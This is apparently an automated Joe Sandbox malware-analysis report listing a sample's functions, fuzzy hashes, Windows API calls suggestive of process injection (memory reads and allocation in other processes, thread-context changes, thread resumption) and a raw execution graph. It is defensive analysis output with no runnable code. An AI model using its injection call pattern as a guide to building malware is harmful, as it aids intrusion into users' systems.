                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID: >+0
                                      • API String ID: 983334009-4245186874
                                      • Opcode ID: 08099fd14675ea73c30ae52a0df048c3f8dc1ff7bb5969792c2063373a3fcd3b
                                      • Instruction ID: 82b0c1d0ae376041ac62707b6e76dc8e34f31e8419a33fd1aca1149e5d8746cb
                                      • Opcode Fuzzy Hash: 08099fd14675ea73c30ae52a0df048c3f8dc1ff7bb5969792c2063373a3fcd3b
                                      • Instruction Fuzzy Hash: C92104719006098FDB10DFAAC485BEEBBF4EF88324F14842AD459A7381DB789945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503D98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08503E18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID: >+0
                                      • API String ID: 1726664587-4245186874
                                      • Opcode ID: d91a38f63e238678853aff5377d29b5f740365899798447e345847f1e61885b7
                                      • Instruction ID: cb7e670a2c400265ca9add87eb64adff6f2422fbf69900d2aa51529c43b96c19
                                      • Opcode Fuzzy Hash: d91a38f63e238678853aff5377d29b5f740365899798447e345847f1e61885b7
                                      • Instruction Fuzzy Hash: 312125718002499FCB10CFAAC885AEEFBF5FF88310F10842AE519A7240C7789954CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0105B1D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0105B039,00000800,00000000,00000000), ref: 0105B24A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: >+0
                                      • API String ID: 1029625771-4245186874
                                      • Opcode ID: 178ed41b732434d96d588601f011b2fecc1170135387a3b189a20d7e5b0577f5
                                      • Instruction ID: 328412a4edc6bf269b10771d79bc6c4dee5d0e7128693366f55ed7b42893deec
                                      • Opcode Fuzzy Hash: 178ed41b732434d96d588601f011b2fecc1170135387a3b189a20d7e5b0577f5
                                      • Instruction Fuzzy Hash: 661129B6D002098FDB14CFAAD884ADEFFF5EB48350F10852AD959A7700C379A545CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503BE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08503C56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: >+0
                                      • API String ID: 4275171209-4245186874
                                      • Opcode ID: 7aebcced8753c3a0996fd93eda69073573eefb9591d0416bece3dedecac8703b
                                      • Instruction ID: fea8dce5296a95472221b303565975886b70d37b35a45e1960da5bf77222f852
                                      • Opcode Fuzzy Hash: 7aebcced8753c3a0996fd93eda69073573eefb9591d0416bece3dedecac8703b
                                      • Instruction Fuzzy Hash: B01156719002499FCB20CFAAC845AEEBFF5FF88320F14881AE459A7250C7759955CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0105A0F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0105B039,00000800,00000000,00000000), ref: 0105B24A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: >+0
                                      • API String ID: 1029625771-4245186874
                                      • Opcode ID: 5238ae5547dfe5c3067ab609c914fa4be0307cba9262c90f75887d6296626b4d
                                      • Instruction ID: e6e28b3d3c24aa2b66bbc95df428aae8bb14748856799f5b1751108c45d621ac
                                      • Opcode Fuzzy Hash: 5238ae5547dfe5c3067ab609c914fa4be0307cba9262c90f75887d6296626b4d
                                      • Instruction Fuzzy Hash: 571114B69003489FDB20CF9AD444AAEFBF5EB88310F10842AE959A7600C375A545CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503BE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08503C56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: >+0
                                      • API String ID: 4275171209-4245186874
                                      • Opcode ID: 58ce1060ddbd43c6e1024aed79d7295d11f02e24ee0cebb6486c38647e48b247
                                      • Instruction ID: c59cb2104091e551115c731d43aa2d72bfedddcc3647f62789343775bf3b273c
                                      • Opcode Fuzzy Hash: 58ce1060ddbd43c6e1024aed79d7295d11f02e24ee0cebb6486c38647e48b247
                                      • Instruction Fuzzy Hash: A31134719002499FCB20DFAAC845ADFBFF5FF88320F14881AE559A7250C779A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503A58 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID: >+0
                                      • API String ID: 947044025-4245186874
                                      • Opcode ID: c2effc54fe7ad22e704c93f4da41e55d87d5dc46ec97cf1997356dc04b3db3cb
                                      • Instruction ID: b589534e0cb6062200c6fde4bffa80e6861942027f5f027836605de3199b81c5
                                      • Opcode Fuzzy Hash: c2effc54fe7ad22e704c93f4da41e55d87d5dc46ec97cf1997356dc04b3db3cb
                                      • Instruction Fuzzy Hash: 5B1158719002488FDB20CFAAC8457EEFFF4EB88324F24881AD419A7740C7799944CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503A60 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID: >+0
                                      • API String ID: 947044025-4245186874
                                      • Opcode ID: 036672e894053df46b0568ce912bdf30781668047d96d00165a1529610f7cfdc
                                      • Instruction ID: 15a52a0a35f1f68dc7bbd7950455a9003fe5cd5b9bdae1cb14bd9526b6675c11
                                      • Opcode Fuzzy Hash: 036672e894053df46b0568ce912bdf30781668047d96d00165a1529610f7cfdc
                                      • Instruction Fuzzy Hash: C7113A71D002488FDB20DFAAC8457DEFBF8EB88324F14881AD419A7340C779A544CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08505498 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 085054FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID: >+0
                                      • API String ID: 410705778-4245186874
                                      • Opcode ID: 7ffb9fac1d3f0de70cfc383a5ba1f36975157daed9d3bc2a3042790dd60fb2a3
                                      • Instruction ID: c11943092234090016d6acd5700bf3b5569a622419da8a686629efcb8f5c7f7e
                                      • Opcode Fuzzy Hash: 7ffb9fac1d3f0de70cfc383a5ba1f36975157daed9d3bc2a3042790dd60fb2a3
                                      • Instruction Fuzzy Hash: 761110B58002889FDB20CFA9D485BEEBFF4FB88310F14881AE559A7240D375A944CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08502548 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 085054FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID: >+0
                                      • API String ID: 410705778-4245186874
                                      • Opcode ID: 13199cc860d4564adfd9a373329faf4c2b06c690b70dc03431d914713a1ea455
                                      • Instruction ID: c831868d51568ee7c3c56bf382cda86c2eb0986a9ce8c37393bcf46fb7da12d1
                                      • Opcode Fuzzy Hash: 13199cc860d4564adfd9a373329faf4c2b06c690b70dc03431d914713a1ea455
                                      • Instruction Fuzzy Hash: D411F2B58003489FDB20DF9AD849BDEBBF8FB48324F10881AE519B7240D375A944CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0105AF58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFBE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: >+0
                                      • API String ID: 4139908857-4245186874
                                      • Opcode ID: 63aa161893504a4b66e2d1cf8efcf6c67c12eaaa301c7e97259056728c2d917b
                                      • Instruction ID: eb523ae4ec9c88724cb386219eeb8828b17a69966c75792fec36271841a8e4b9
                                      • Opcode Fuzzy Hash: 63aa161893504a4b66e2d1cf8efcf6c67c12eaaa301c7e97259056728c2d917b
                                      • Instruction Fuzzy Hash: 771110B5D00249CFDB20CF9AD444ADEFBF4EB88324F10855AD969A7640C379A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01055A84 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2868d6c667b200259622fe5ac718df8b0780cd4a4b15289162ca8884f21243b3
                                      • Instruction ID: 2dfa66dfddd354625f79dca1e6bc36a230d43f93e111c9c5789d6bc198635792
                                      • Opcode Fuzzy Hash: 2868d6c667b200259622fe5ac718df8b0780cd4a4b15289162ca8884f21243b3
                                      • Instruction Fuzzy Hash: 6631DFB1C04249CFDF60DFA8C8856EEBBF1EF56314F548189C845AB252C77AA946CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FBD3D8 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 043146fe46849798b3f431f0d091fc645ebfb849731eb526749ad85a66c74eb2
                                      • Instruction ID: b250c32ca5e095b9766d643855d0b01625f18a4316de305d6fb975cc04f03a46
                                      • Opcode Fuzzy Hash: 043146fe46849798b3f431f0d091fc645ebfb849731eb526749ad85a66c74eb2
                                      • Instruction Fuzzy Hash: F3212872504204DFDB05DF14D9C0B56BF65FB94324F24C569E8090B256D33AE85ADBA3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FCD01C Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00b453907546c332a241eee632d1348d79914cb95b7dc3e264a6614d9f58d247
                                      • Instruction ID: d7fbd918347747879880e2babc275efbcfc4ef40d1bbaf367dcbb40630e90e6f
                                      • Opcode Fuzzy Hash: 00b453907546c332a241eee632d1348d79914cb95b7dc3e264a6614d9f58d247
                                      • Instruction Fuzzy Hash: 1B21F571544241DFCB14DF18D6C1F1ABBA5FB84324F24C57DD84A4B25AC33AD847DA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FCD1D4 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53d520effaa5841b357101f45184ffcc2c57a896bfe9337ff903acb915ba5ef7
                                      • Instruction ID: 949da4c5ef2f817f39135f8a5d6a3074a17fa24e853680bc52b56b0d654bee97
                                      • Opcode Fuzzy Hash: 53d520effaa5841b357101f45184ffcc2c57a896bfe9337ff903acb915ba5ef7
                                      • Instruction Fuzzy Hash: 9C210771904205EFDB05DF14DAC1F2ABBA5FB84324F24C57DE8494B255C33AD84ADA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FCD005 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ee464acc89c672473369924470d989c7eef47662a690a6841074dca3ee9cb5f
                                      • Instruction ID: 3ddbc750abfe9f442a759b1538f4bb4f8ccb1f68c8bc730a96d4c6d266eec8dc
                                      • Opcode Fuzzy Hash: 7ee464acc89c672473369924470d989c7eef47662a690a6841074dca3ee9cb5f
                                      • Instruction Fuzzy Hash: BA2183755493C08FD712CF24D590B15BF71EB46314F28C5EED8498B6A7C33A980ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FBD3D3 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cae3b6844d2871f49ad6d6254d0f57adde39064464dffcc4ffd3882d1f7b116e
                                      • Instruction ID: 3c118f9142195590e5843323000645cf913a5c2780631a1fb62110b52e587e99
                                      • Opcode Fuzzy Hash: cae3b6844d2871f49ad6d6254d0f57adde39064464dffcc4ffd3882d1f7b116e
                                      • Instruction Fuzzy Hash: A6110376804280CFCB16CF00D5C0B56BF71FB94324F24C6A9D8090B256C33AE85ADFA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FCD1CF Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e25339e4a781eaa9bd4a5f7eb4d1d258efe866b60a64346677ccae7196d18d73
                                      • Instruction ID: b08fe057d49c73eee6f03ae70a3b38a5da4e535c90339cc07eb85843cc5ed904
                                      • Opcode Fuzzy Hash: e25339e4a781eaa9bd4a5f7eb4d1d258efe866b60a64346677ccae7196d18d73
                                      • Instruction Fuzzy Hash: F011D075904280DFCB15CF10DAC0B19FB71FB84324F24C6ADD8494B256C33AD80ACB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FBD745 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 066416c95fc4dd1d8c88456e7b13a7f1f5117ba82888a8bd293bc1efc10fdb77
                                      • Instruction ID: 7ae9af04a93669f8be47cd723df279f8b51882715bb8fc8bc0e106c29f14a1ba
                                      • Opcode Fuzzy Hash: 066416c95fc4dd1d8c88456e7b13a7f1f5117ba82888a8bd293bc1efc10fdb77
                                      • Instruction Fuzzy Hash: 0901DB724043409AE7105E1BCD84BE7BFA8DF41374F38C55AED094A286EA799844DF72
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00FBD744 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01458252e5123650cc6d69dc5ecfa1241ff7a4c8c6d35ce6aaa1376612674c6e
                                      • Instruction ID: 0bba66240162282387eba2527eee754003d3250af25cb43bb4d170c28e941006
                                      • Opcode Fuzzy Hash: 01458252e5123650cc6d69dc5ecfa1241ff7a4c8c6d35ce6aaa1376612674c6e
                                      • Instruction Fuzzy Hash: 22F096754053449EEB148E1ACC84BA7FFA8EB91734F28C55AED084B286D7799C44CFB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0105D57C Relevance: .3, Instructions: 264COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c010552654b153551acc73909388f0bec7be2ef671c263ae5f792de9b432d7af
                                      • Instruction ID: 4a2dcac4319335f0e556df6ce1bf0e384ba9e0098f113c15b5d2878a5028e083
                                      • Opcode Fuzzy Hash: c010552654b153551acc73909388f0bec7be2ef671c263ae5f792de9b432d7af
                                      • Instruction Fuzzy Hash: ECA18F32E0021A8FCF45DFB4C8405DFBBB2FF85304B1585AAE901AB261DB75E956CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:4.3%
                                      Dynamic/Decrypted Code Coverage:4.1%
                                      Signature Coverage:7.2%
                                      Total number of Nodes:556
                                      Total number of Limit Nodes:67
                                      execution_graph 32530 41f020 32533 41b960 32530->32533 32534 41b986 32533->32534 32541 409d30 32534->32541 32536 41b992 32537 41b9b3 32536->32537 32549 40c1b0 32536->32549 32539 41b9a5 32585 41a6a0 32539->32585 32588 409c80 32541->32588 32543 409d3d 32544 409d44 32543->32544 32600 409c20 32543->32600 32544->32536 32550 40c1d5 32549->32550 33011 40b1b0 32550->33011 32552 40c22c 33015 40ae30 32552->33015 32554 40c252 32584 40c4a3 32554->32584 33024 414390 32554->33024 32556 40c297 32556->32584 33027 408a60 32556->33027 32558 40c2db 32558->32584 33034 41a4f0 32558->33034 32562 40c331 32563 40c338 32562->32563 33046 41a000 32562->33046 32564 41bdb0 2 API calls 32563->32564 32566 40c345 32564->32566 32566->32539 32568 40c382 32569 41bdb0 2 API calls 32568->32569 32570 40c389 32569->32570 32570->32539 32571 40c392 32572 40f490 3 API calls 32571->32572 32573 40c406 32572->32573 32573->32563 32574 40c411 32573->32574 32575 41bdb0 2 API calls 32574->32575 32576 40c435 32575->32576 33051 41a050 32576->33051 32579 41a000 2 API calls 32580 40c470 32579->32580 32580->32584 33056 419e10 32580->33056 32583 41a6a0 2 API calls 32583->32584 32584->32539 32586 41a6bf ExitProcess 32585->32586 32587 41af50 LdrLoadDll 32585->32587 32587->32586 32619 418bb0 32588->32619 32592 409ca6 32592->32543 32593 409c9c 32593->32592 32626 41b2a0 32593->32626 32595 409ce3 32595->32592 32637 409aa0 32595->32637 32597 409d03 32643 409620 LdrLoadDll 32597->32643 32599 409d15 32599->32543 32601 409c3a 32600->32601 32602 41b590 LdrLoadDll 32600->32602 32986 41b590 32601->32986 32602->32601 32605 41b590 LdrLoadDll 32606 409c61 32605->32606 32607 40f170 32606->32607 32608 40f189 32607->32608 32994 40b030 32608->32994 32610 40f19c 32998 41a1d0 32610->32998 32614 40f1c2 32615 40f1ed 32614->32615 33004 41a250 32614->33004 32617 41a480 2 API calls 32615->32617 32618 409d55 32617->32618 32618->32536 32620 418bbf 32619->32620 32644 414e40 32620->32644 32622 409c93 32623 418a60 32622->32623 32650 41a5f0 32623->32650 32627 41b2b9 32626->32627 32657 414a40 32627->32657 32629 41b2d1 32630 41b2da 32629->32630 32696 41b0e0 32629->32696 32630->32595 32632 41b2ee 32632->32630 32714 419ef0 32632->32714 32964 407ea0 32637->32964 32639 409ac1 32639->32597 32640 409aba 32640->32639 32977 408160 32640->32977 32643->32599 32645 414e5a 32644->32645 32646 414e4e 32644->32646 32645->32622 32646->32645 32649 4152c0 LdrLoadDll 32646->32649 32648 414fac 32648->32622 32649->32648 32653 41af50 32650->32653 32652 418a75 32652->32593 32654 41af60 32653->32654 32656 41af82 32653->32656 32655 414e40 LdrLoadDll 32654->32655 32655->32656 32656->32652 32658 414d75 32657->32658 32659 414a54 32657->32659 32658->32629 32659->32658 32722 419c40 32659->32722 32662 414b80 32725 41a350 32662->32725 32663 414b63 32782 41a450 LdrLoadDll 32663->32782 32666 414b6d 32666->32629 32667 414ba7 32668 41bdb0 2 API calls 32667->32668 32669 414bb3 32668->32669 32669->32666 32670 414d39 32669->32670 32672 414d4f 32669->32672 32676 414c42 32669->32676 32671 41a480 2 API calls 32670->32671 32673 414d40 32671->32673 32791 414780 LdrLoadDll NtReadFile NtClose 32672->32791 32673->32629 32675 414d62 32675->32629 32677 414ca9 32676->32677 32679 414c51 32676->32679 32677->32670 32678 414cbc 32677->32678 32784 41a2d0 32678->32784 32681 414c56 32679->32681 32682 414c6a 32679->32682 32783 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32681->32783 32685 414c87 32682->32685 32686 414c6f 32682->32686 32685->32673 32740 414400 32685->32740 32728 4146e0 32686->32728 32689 414c60 32689->32629 32690 414c7d 32690->32629 32692 414d1c 32788 41a480 32692->32788 32693 414c9f 32693->32629 32695 414d28 32695->32629 32697 41b0f1 32696->32697 32698 41b103 32697->32698 32809 41bd30 32697->32809 32698->32632 32700 41b124 32812 414060 32700->32812 32702 41b170 32702->32632 32703 41b147 32703->32702 32704 414060 3 API calls 32703->32704 32707 41b169 32704->32707 32706 41b1fa 32708 41b20a 32706->32708 32931 41aef0 LdrLoadDll 32706->32931 32707->32702 32837 415380 32707->32837 32847 41ad60 32708->32847 32711 41b238 32926 419eb0 32711->32926 32715 419f0c 32714->32715 32716 41af50 LdrLoadDll 32714->32716 32958 17e2bca 32715->32958 32716->32715 32717 419f27 32719 41bdb0 32717->32719 32720 41b349 32719->32720 32961 41a660 32719->32961 32720->32595 32723 41af50 LdrLoadDll 32722->32723 32724 414b34 32723->32724 32724->32662 32724->32663 32724->32666 32726 41af50 LdrLoadDll 32725->32726 32727 41a36c NtCreateFile 32726->32727 32727->32667 32729 4146fc 32728->32729 32730 41a2d0 LdrLoadDll 32729->32730 32731 41471d 32730->32731 32732 414724 32731->32732 32733 414738 32731->32733 32735 41a480 2 API calls 32732->32735 32734 41a480 2 API calls 32733->32734 32736 414741 32734->32736 32737 41472d 32735->32737 32792 41bfc0 LdrLoadDll RtlAllocateHeap 32736->32792 32737->32690 32739 41474c 32739->32690 32741 41444b 32740->32741 32742 41447e 32740->32742 32744 41a2d0 LdrLoadDll 32741->32744 32743 4145c9 32742->32743 32748 41449a 32742->32748 32745 41a2d0 LdrLoadDll 32743->32745 32746 414466 32744->32746 32752 4145e4 32745->32752 32747 41a480 2 API calls 32746->32747 32749 41446f 32747->32749 32750 41a2d0 LdrLoadDll 32748->32750 32749->32693 32751 4144b5 32750->32751 32754 4144d1 32751->32754 32755 4144bc 32751->32755 32805 41a310 LdrLoadDll 32752->32805 32758 4144d6 32754->32758 32763 4144ec 32754->32763 32757 41a480 2 API calls 32755->32757 32756 41461e 32759 41a480 2 API calls 32756->32759 32760 4144c5 32757->32760 32761 41a480 2 API calls 32758->32761 32764 414629 32759->32764 32760->32693 32765 4144df 32761->32765 32762 4144f1 32769 414503 32762->32769 32796 41a400 32762->32796 32763->32762 32793 41bf80 32763->32793 32764->32693 32765->32693 32768 414557 32770 41456e 32768->32770 32804 41a290 LdrLoadDll 32768->32804 32769->32693 32771 414575 32770->32771 32772 41458a 32770->32772 32774 41a480 2 API calls 32771->32774 32775 41a480 2 API calls 32772->32775 32774->32769 32776 414593 32775->32776 32777 4145bf 32776->32777 32799 41bb80 32776->32799 32777->32693 32779 4145aa 32780 41bdb0 2 API calls 32779->32780 32781 4145b3 32780->32781 32781->32693 32782->32666 32783->32689 32785 41af50 LdrLoadDll 32784->32785 32786 414d04 32784->32786 32785->32786 32787 41a310 LdrLoadDll 32786->32787 32787->32692 32789 41af50 LdrLoadDll 32788->32789 32790 41a49c NtClose 32789->32790 32790->32695 32791->32675 32792->32739 32795 41bf98 32793->32795 32806 41a620 32793->32806 32795->32762 32797 41a41c NtReadFile 32796->32797 32798 41af50 LdrLoadDll 32796->32798 32797->32768 32798->32797 32800 41bba4 32799->32800 32801 41bb8d 32799->32801 32800->32779 32801->32800 32802 41bf80 2 API calls 32801->32802 32803 41bbbb 32802->32803 32803->32779 32804->32770 32805->32756 32807 41af50 LdrLoadDll 32806->32807 32808 41a63c RtlAllocateHeap 32807->32808 32808->32795 32932 41a530 32809->32932 32811 41bd5d 32811->32700 32813 414071 32812->32813 32815 414079 32812->32815 32813->32703 32814 41434c 32814->32703 32815->32814 32935 41cf20 32815->32935 32817 4140cd 32818 41cf20 2 API calls 32817->32818 32821 4140d8 32818->32821 32819 414126 32822 41cf20 2 API calls 32819->32822 32821->32819 32940 41cfc0 32821->32940 32823 41413a 32822->32823 32824 41cf20 2 API calls 32823->32824 32826 4141ad 32824->32826 32825 41cf20 2 API calls 32833 4141f5 32825->32833 32826->32825 32828 414324 32947 41cf80 LdrLoadDll RtlFreeHeap 32828->32947 32830 41432e 32948 41cf80 LdrLoadDll RtlFreeHeap 32830->32948 32832 414338 32949 41cf80 LdrLoadDll RtlFreeHeap 32832->32949 32946 41cf80 LdrLoadDll RtlFreeHeap 32833->32946 32835 414342 32950 41cf80 